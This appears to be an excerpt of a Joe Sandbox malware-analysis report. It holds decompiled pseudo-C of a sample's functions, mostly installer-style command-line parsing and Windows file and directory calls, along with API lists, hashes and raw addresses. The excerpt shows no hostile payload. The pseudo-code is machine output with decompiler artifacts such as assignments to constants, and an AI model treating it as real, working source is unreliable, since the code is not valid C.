• Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CharPrev
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 122130370-0
                                                                                                                                                                                                      • Opcode ID: 903a34d34e2d2b7e9c0d310593f5669d635e6606711bd59f2749560589277e8d
                                                                                                                                                                                                      • Instruction ID: bca56a6774dc6f2f8886705452ec377dd2df22e2aaaa633e68cd5dd0e3d3abaf
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 903a34d34e2d2b7e9c0d310593f5669d635e6606711bd59f2749560589277e8d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2DF0AC321046519FD332091D9884BA6BFCEDBC6318F28996EE8DEE3245DA658C45A3A0
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                      			E00E7621E() {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				signed int _t5;
                                                                                                                                                                                                      				void* _t9;
                                                                                                                                                                                                      				void* _t13;
                                                                                                                                                                                                      				void* _t19;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				signed int _t21;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t5 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                      				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                      					0x4f0 = 2;
                                                                                                                                                                                                      					_t9 = E00E7597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					E00E744B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                      					 *0xe79124 = E00E76285();
                                                                                                                                                                                                      					_t9 = 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00E76CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                      			}












                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00E7623F
                                                                                                                                                                                                        • Part of subcall function 00E744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E74518
                                                                                                                                                                                                        • Part of subcall function 00E744B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00E74554
                                                                                                                                                                                                        • Part of subcall function 00E76285: GetLastError.KERNEL32(00E75BBC), ref: 00E76285
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 381621628-0
                                                                                                                                                                                                      • Opcode ID: 7b8618a219188790249b07d5497d59429ecb7b7ae94b6f9e9c9ee4ecd6c5c182
                                                                                                                                                                                                      • Instruction ID: fbb3e96c23c09ef994ad7b8ec005b6965d880c607dea7876160e303a83a14d24
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b8618a219188790249b07d5497d59429ecb7b7ae94b6f9e9c9ee4ecd6c5c182
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 51F0E9B0700208AFE790EB749D06FBE73ECDB94304F408479B98DF6092ED749D848650
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00E74B60(signed int _a4) {
                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                      				signed int _t15;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t15 = _a4 * 0x18;
                                                                                                                                                                                                      				if( *((intOrPtr*)(_t15 + 0xe78d64)) != 1) {
                                                                                                                                                                                                      					_t9 = FindCloseChangeNotification( *(_t15 + 0xe78d74)); // executed
                                                                                                                                                                                                      					if(_t9 == 0) {
                                                                                                                                                                                                      						return _t9 | 0xffffffff;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					 *((intOrPtr*)(_t15 + 0xe78d60)) = 1;
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				 *((intOrPtr*)(_t15 + 0xe78d60)) = 1;
                                                                                                                                                                                                      				 *((intOrPtr*)(_t15 + 0xe78d68)) = 0;
                                                                                                                                                                                                      				 *((intOrPtr*)(_t15 + 0xe78d70)) = 0;
                                                                                                                                                                                                      				 *((intOrPtr*)(_t15 + 0xe78d6c)) = 0;
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}






                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00E74FA1,00000000), ref: 00E74B98
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2591292051-0
                                                                                                                                                                                                      • Opcode ID: dd4682ecd126857fc57e578e429eb932605e6cd4c5824dc48d2a780f6f3bfd45
                                                                                                                                                                                                      • Instruction ID: 13fcdfaeceeb7bda2e0ba45b54d37b259fa7668a616343e8fd43bcf8449210b3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: dd4682ecd126857fc57e578e429eb932605e6cd4c5824dc48d2a780f6f3bfd45
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 55F0F471680B089E4771CE398D08552BBEAAAB53A17105A2B956EF21D4DB30AC41CB90
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00E766AE(CHAR* __ecx) {
                                                                                                                                                                                                      				unsigned int _t1;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                      				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                      					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}





                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(?,00E74777,?,00E74E38,?), ref: 00E766B1
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00E74CA0(long _a4) {
                                                                                                                                                                                                      				void* _t2;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                      				return _t2;
                                                                                                                                                                                                      			}





                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GlobalAlloc.KERNELBASE(00000000,?), ref: 00E74CAA
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AllocGlobal
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00E74CC0(void* _a4) {
                                                                                                                                                                                                      				void* _t2;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                      				return _t2;
                                                                                                                                                                                                      			}





                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FreeGlobal
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                                                                                      			E00E75C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                                      				CHAR* _v265;
                                                                                                                                                                                                      				char _v266;
                                                                                                                                                                                                      				char _v267;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				CHAR* _v272;
                                                                                                                                                                                                      				char _v276;
                                                                                                                                                                                                      				signed int _v296;
                                                                                                                                                                                                      				char _v556;
                                                                                                                                                                                                      				signed int _t61;
                                                                                                                                                                                                      				int _t63;
                                                                                                                                                                                                      				char _t67;
                                                                                                                                                                                                      				CHAR* _t69;
                                                                                                                                                                                                      				signed int _t71;
                                                                                                                                                                                                      				void* _t75;
                                                                                                                                                                                                      				char _t79;
                                                                                                                                                                                                      				void* _t83;
                                                                                                                                                                                                      				void* _t85;
                                                                                                                                                                                                      				void* _t87;
                                                                                                                                                                                                      				intOrPtr _t88;
                                                                                                                                                                                                      				void* _t100;
                                                                                                                                                                                                      				intOrPtr _t101;
                                                                                                                                                                                                      				CHAR* _t104;
                                                                                                                                                                                                      				intOrPtr _t105;
                                                                                                                                                                                                      				void* _t111;
                                                                                                                                                                                                      				void* _t115;
                                                                                                                                                                                                      				CHAR* _t118;
                                                                                                                                                                                                      				void* _t119;
                                                                                                                                                                                                      				void* _t127;
                                                                                                                                                                                                      				CHAR* _t129;
                                                                                                                                                                                                      				void* _t132;
                                                                                                                                                                                                      				void* _t142;
                                                                                                                                                                                                      				signed int _t143;
                                                                                                                                                                                                      				CHAR* _t144;
                                                                                                                                                                                                      				void* _t145;
                                                                                                                                                                                                      				void* _t146;
                                                                                                                                                                                                      				void* _t147;
                                                                                                                                                                                                      				void* _t149;
                                                                                                                                                                                                      				char _t155;
                                                                                                                                                                                                      				void* _t157;
                                                                                                                                                                                                      				void* _t162;
                                                                                                                                                                                                      				void* _t163;
                                                                                                                                                                                                      				char _t167;
                                                                                                                                                                                                      				char _t170;
                                                                                                                                                                                                      				CHAR* _t173;
                                                                                                                                                                                                      				void* _t177;
                                                                                                                                                                                                      				intOrPtr* _t183;
                                                                                                                                                                                                      				intOrPtr* _t192;
                                                                                                                                                                                                      				CHAR* _t199;
                                                                                                                                                                                                      				void* _t200;
                                                                                                                                                                                                      				CHAR* _t201;
                                                                                                                                                                                                      				void* _t205;
                                                                                                                                                                                                      				void* _t206;
                                                                                                                                                                                                      				int _t209;
                                                                                                                                                                                                      				void* _t210;
                                                                                                                                                                                                      				void* _t212;
                                                                                                                                                                                                      				void* _t213;
                                                                                                                                                                                                      				CHAR* _t218;
                                                                                                                                                                                                      				intOrPtr* _t219;
                                                                                                                                                                                                      				intOrPtr* _t220;
                                                                                                                                                                                                      				signed int _t221;
                                                                                                                                                                                                      				signed int _t223;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t173 = __ecx;
                                                                                                                                                                                                      				_t61 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t61 ^ _t221;
                                                                                                                                                                                                      				_push(__ebx);
                                                                                                                                                                                                      				_push(__esi);
                                                                                                                                                                                                      				_push(__edi);
                                                                                                                                                                                                      				_t209 = 1;
                                                                                                                                                                                                      				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                      					_t63 = 1;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					L2:
                                                                                                                                                                                                      					while(_t209 != 0) {
                                                                                                                                                                                                      						_t67 =  *_t173;
                                                                                                                                                                                                      						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                                                                                                                                                      							_t173 = CharNextA(_t173);
                                                                                                                                                                                                      							continue;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_v272 = _t173;
                                                                                                                                                                                                      						if(_t67 == 0) {
                                                                                                                                                                                                      							break;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t69 = _v272;
                                                                                                                                                                                                      							_t177 = 0;
                                                                                                                                                                                                      							_t213 = 0;
                                                                                                                                                                                                      							_t163 = 0;
                                                                                                                                                                                                      							_t202 = 1;
                                                                                                                                                                                                      							do {
                                                                                                                                                                                                      								if(_t213 != 0) {
                                                                                                                                                                                                      									if(_t163 != 0) {
                                                                                                                                                                                                      										break;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										goto L21;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t69 =  *_t69;
                                                                                                                                                                                                      									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                                                                                                                                                      										break;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t69 = _v272;
                                                                                                                                                                                                      										L21:
                                                                                                                                                                                                      										_t155 =  *_t69;
                                                                                                                                                                                                      										if(_t155 != 0x22) {
                                                                                                                                                                                                      											if(_t202 >= 0x104) {
                                                                                                                                                                                                      												goto L106;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                                                                                                                                                      												_t177 = _t177 + 1;
                                                                                                                                                                                                      												_t202 = _t202 + 1;
                                                                                                                                                                                                      												_t157 = 1;
                                                                                                                                                                                                      												goto L30;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											if(_v272[1] == 0x22) {
                                                                                                                                                                                                      												if(_t202 >= 0x104) {
                                                                                                                                                                                                      													L106:
                                                                                                                                                                                                      													_t63 = 0;
                                                                                                                                                                                                      													L125:
                                                                                                                                                                                                      													_pop(_t210);
                                                                                                                                                                                                      													_pop(_t212);
                                                                                                                                                                                                      													_pop(_t162);
                                                                                                                                                                                                      													return E00E76CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                      													_t177 = _t177 + 1;
                                                                                                                                                                                                      													_t202 = _t202 + 1;
                                                                                                                                                                                                      													_t157 = 2;
                                                                                                                                                                                                      													goto L30;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												_t157 = 1;
                                                                                                                                                                                                      												if(_t213 != 0) {
                                                                                                                                                                                                      													_t163 = 1;
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													_t213 = 1;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												goto L30;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								goto L131;
                                                                                                                                                                                                      								L30:
                                                                                                                                                                                                      								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                      								_t69 = _v272;
                                                                                                                                                                                                      							} while ( *_t69 != 0);
                                                                                                                                                                                                      							if(_t177 >= 0x104) {
                                                                                                                                                                                                      								E00E76E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                                                                                                                                                      								asm("int3");
                                                                                                                                                                                                      								_push(_t221);
                                                                                                                                                                                                      								_t222 = _t223;
                                                                                                                                                                                                      								_t71 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      								_v296 = _t71 ^ _t223;
                                                                                                                                                                                                      								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                                                                                                                                                      									0x4f0 = 2;
                                                                                                                                                                                                      									_t75 = E00E7597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									E00E744B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                                                                                                                                                      									 *0xe79124 = E00E76285();
                                                                                                                                                                                                      									_t75 = 0;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								return E00E76CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                      								if(_t213 == 0) {
                                                                                                                                                                                                      									if(_t163 != 0) {
                                                                                                                                                                                                      										goto L34;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										goto L40;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									if(_t163 != 0) {
                                                                                                                                                                                                      										L40:
                                                                                                                                                                                                      										_t79 = _v268;
                                                                                                                                                                                                      										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                      											_t83 = CharUpperA(_v267) - 0x3f;
                                                                                                                                                                                                      											if(_t83 == 0) {
                                                                                                                                                                                                      												_t202 = 0x521;
                                                                                                                                                                                                      												E00E744B9(0, 0x521, 0xe71140, 0, 0x40, 0);
                                                                                                                                                                                                      												_t85 =  *0xe78588; // 0x0
                                                                                                                                                                                                      												if(_t85 != 0) {
                                                                                                                                                                                                      													CloseHandle(_t85);
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												ExitProcess(0);
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											_t87 = _t83 - 4;
                                                                                                                                                                                                      											if(_t87 == 0) {
                                                                                                                                                                                                      												if(_v266 != 0) {
                                                                                                                                                                                                      													if(_v266 != 0x3a) {
                                                                                                                                                                                                      														goto L49;
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                      														_t215 =  &_v268 + _t167;
                                                                                                                                                                                                      														_t183 =  &_v268 + _t167;
                                                                                                                                                                                                      														_t50 = _t183 + 1; // 0x1
                                                                                                                                                                                                      														_t202 = _t50;
                                                                                                                                                                                                      														do {
                                                                                                                                                                                                      															_t88 =  *_t183;
                                                                                                                                                                                                      															_t183 = _t183 + 1;
                                                                                                                                                                                                      														} while (_t88 != 0);
                                                                                                                                                                                                      														if(_t183 == _t202) {
															goto L49;
														} else {
															_t205 = 0x5b;
															if(E00E7667F(_t215, _t205) == 0) {
																L115:
																_t206 = 0x5d;
																if(E00E7667F(_t215, _t206) == 0) {
																	L117:
																	_t202 =  &_v276;
																	_v276 = _t167;
																	if(E00E75C17(_t215,  &_v276) == 0) {
																		goto L49;
																	} else {
																		_t202 = 0x104;
																		E00E71680(0xe78c42, 0x104, _v276 + _t167 +  &_v268);
																	}
																} else {
																	_t202 = 0x5b;
																	if(E00E7667F(_t215, _t202) == 0) {
																		goto L49;
																	} else {
																		goto L117;
																	}
																}
															} else {
																_t202 = 0x5d;
																if(E00E7667F(_t215, _t202) == 0) {
																	goto L49;
																} else {
																	goto L115;
																}
															}
														}
													}
												} else {
													 *0xe78a24 = 1;
												}
												goto L50;
											} else {
												_t100 = _t87 - 1;
												if(_t100 == 0) {
													L98:
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t170 = (0 | _v265 == 0x00000022) + 3;
														_t217 =  &_v268 + _t170;
														_t192 =  &_v268 + _t170;
														_t38 = _t192 + 1; // 0x1
														_t202 = _t38;
														do {
															_t101 =  *_t192;
															_t192 = _t192 + 1;
														} while (_t101 != 0);
														if(_t192 == _t202) {
															goto L49;
														} else {
															_t202 =  &_v276;
															_v276 = _t170;
															if(E00E75C17(_t217,  &_v276) == 0) {
																goto L49;
															} else {
																_t104 = CharUpperA(_v267);
																_t218 = 0xe78b3e;
																_t105 = _v276;
																if(_t104 != 0x54) {
																	_t218 = 0xe78a3a;
																}
																E00E71680(_t218, 0x104, _t105 + _t170 +  &_v268);
																_t202 = 0x104;
																E00E7658A(_t218, 0x104, 0xe71140);
																if(E00E731E0(_t218) != 0) {
																	goto L50;
																} else {
																	goto L106;
																}
															}
														}
													}
												} else {
													_t111 = _t100 - 0xa;
													if(_t111 == 0) {
														if(_v266 != 0) {
															if(_v266 != 0x3a) {
																goto L49;
															} else {
																_t199 = _v265;
																if(_t199 != 0) {
																	_t219 =  &_v265;
																	do {
																		_t219 = _t219 + 1;
																		_t115 = CharUpperA(_t199) - 0x45;
																		if(_t115 == 0) {
																			 *0xe78a2c = 1;
																		} else {
																			_t200 = 2;
																			_t119 = _t115 - _t200;
																			if(_t119 == 0) {
																				 *0xe78a30 = 1;
																			} else {
																				if(_t119 == 0xf) {
																					 *0xe78a34 = 1;
																				} else {
																					_t209 = 0;
																				}
																			}
																		}
																		_t118 =  *_t219;
																		_t199 = _t118;
																	} while (_t118 != 0);
																}
															}
														} else {
															 *0xe78a2c = 1;
														}
														goto L50;
													} else {
														_t127 = _t111 - 3;
														if(_t127 == 0) {
															if(_v266 != 0) {
																if(_v266 != 0x3a) {
																	goto L49;
																} else {
																	_t129 = CharUpperA(_v265);
																	if(_t129 == 0x31) {
																		goto L76;
																	} else {
																		if(_t129 == 0x41) {
																			goto L83;
																		} else {
																			if(_t129 == 0x55) {
																				goto L76;
																			} else {
																				goto L49;
																			}
																		}
																	}
																}
															} else {
																L76:
																_push(2);
																_pop(1);
																L83:
																 *0xe78a38 = 1;
															}
															goto L50;
														} else {
															_t132 = _t127 - 1;
															if(_t132 == 0) {
																if(_v266 != 0) {
																	if(_v266 != 0x3a) {
																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
																			goto L49;
																		}
																	} else {
																		_t201 = _v265;
																		 *0xe79a2c = 1;
																		if(_t201 != 0) {
																			_t220 =  &_v265;
                                                                                                                                                                                                      																			do {
                                                                                                                                                                                                      																				_t220 = _t220 + 1;
                                                                                                                                                                                                      																				_t142 = CharUpperA(_t201) - 0x41;
                                                                                                                                                                                                      																				if(_t142 == 0) {
                                                                                                                                                                                                      																					_t143 = 2;
                                                                                                                                                                                                      																					 *0xe79a2c =  *0xe79a2c | _t143;
                                                                                                                                                                                                      																					goto L70;
                                                                                                                                                                                                      																				} else {
                                                                                                                                                                                                      																					_t145 = _t142 - 3;
                                                                                                                                                                                                      																					if(_t145 == 0) {
                                                                                                                                                                                                      																						 *0xe78d48 =  *0xe78d48 | 0x00000040;
                                                                                                                                                                                                      																					} else {
                                                                                                                                                                                                      																						_t146 = _t145 - 5;
                                                                                                                                                                                                      																						if(_t146 == 0) {
                                                                                                                                                                                                      																							 *0xe79a2c =  *0xe79a2c & 0xfffffffd;
                                                                                                                                                                                                      																							goto L70;
                                                                                                                                                                                                      																						} else {
                                                                                                                                                                                                      																							_t147 = _t146 - 5;
                                                                                                                                                                                                      																							if(_t147 == 0) {
                                                                                                                                                                                                      																								 *0xe79a2c =  *0xe79a2c & 0xfffffffe;
                                                                                                                                                                                                      																								goto L70;
                                                                                                                                                                                                      																							} else {
                                                                                                                                                                                                      																								_t149 = _t147;
                                                                                                                                                                                                      																								if(_t149 == 0) {
                                                                                                                                                                                                      																									 *0xe78d48 =  *0xe78d48 | 0x00000080;
                                                                                                                                                                                                      																								} else {
                                                                                                                                                                                                      																									if(_t149 == 3) {
                                                                                                                                                                                                      																										 *0xe79a2c =  *0xe79a2c | 0x00000004;
                                                                                                                                                                                                      																										L70:
                                                                                                                                                                                                      																										 *0xe78a28 = 1;
                                                                                                                                                                                                      																									} else {
                                                                                                                                                                                                      																										_t209 = 0;
                                                                                                                                                                                                      																									}
                                                                                                                                                                                                      																								}
                                                                                                                                                                                                      																							}
                                                                                                                                                                                                      																						}
                                                                                                                                                                                                      																					}
                                                                                                                                                                                                      																				}
                                                                                                                                                                                                      																				_t144 =  *_t220;
                                                                                                                                                                                                      																				_t201 = _t144;
                                                                                                                                                                                                      																			} while (_t144 != 0);
                                                                                                                                                                                                      																		}
                                                                                                                                                                                                      																	}
                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                      																	 *0xe79a2c = 3;
                                                                                                                                                                                                      																	 *0xe78a28 = 1;
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      																goto L50;
                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                      																if(_t132 == 0) {
                                                                                                                                                                                                      																	goto L98;
                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                      																	L49:
                                                                                                                                                                                                      																	_t209 = 0;
                                                                                                                                                                                                      																	L50:
                                                                                                                                                                                                      																	_t173 = _v272;
                                                                                                                                                                                                      																	if( *_t173 != 0) {
                                                                                                                                                                                                      																		goto L2;
                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                      																		break;
                                                                                                                                                                                                      																	}
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											goto L106;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										L34:
                                                                                                                                                                                                      										_t209 = 0;
                                                                                                                                                                                                      										break;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L131;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if( *0xe78a2c != 0 &&  *0xe78b3e == 0) {
                                                                                                                                                                                                      						if(GetModuleFileNameA( *0xe79a3c, 0xe78b3e, 0x104) == 0) {
                                                                                                                                                                                                      							_t209 = 0;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t202 = 0x5c;
                                                                                                                                                                                                      							 *((char*)(E00E766C8(0xe78b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t63 = _t209;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				L131:
                                                                                                                                                                                                      			}


































































                                                                                                                                                                                                      0x00e75d72
                                                                                                                                                                                                      0x00e760fb
                                                                                                                                                                                                      0x00e760fb
                                                                                                                                                                                                      0x00e76207
                                                                                                                                                                                                      0x00e7620a
                                                                                                                                                                                                      0x00e7620b
                                                                                                                                                                                                      0x00e7620e
                                                                                                                                                                                                      0x00e76217
                                                                                                                                                                                                      0x00e75d78
                                                                                                                                                                                                      0x00e75d78
                                                                                                                                                                                                      0x00e75d80
                                                                                                                                                                                                      0x00e75d83
                                                                                                                                                                                                      0x00e75d84
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75d84
                                                                                                                                                                                                      0x00e75d5d
                                                                                                                                                                                                      0x00e75d5f
                                                                                                                                                                                                      0x00e75d62
                                                                                                                                                                                                      0x00e75d68
                                                                                                                                                                                                      0x00e75d64
                                                                                                                                                                                                      0x00e75d64
                                                                                                                                                                                                      0x00e75d64
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75d62
                                                                                                                                                                                                      0x00e75d5b
                                                                                                                                                                                                      0x00e75d4f
                                                                                                                                                                                                      0x00e75d1d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e75d9f
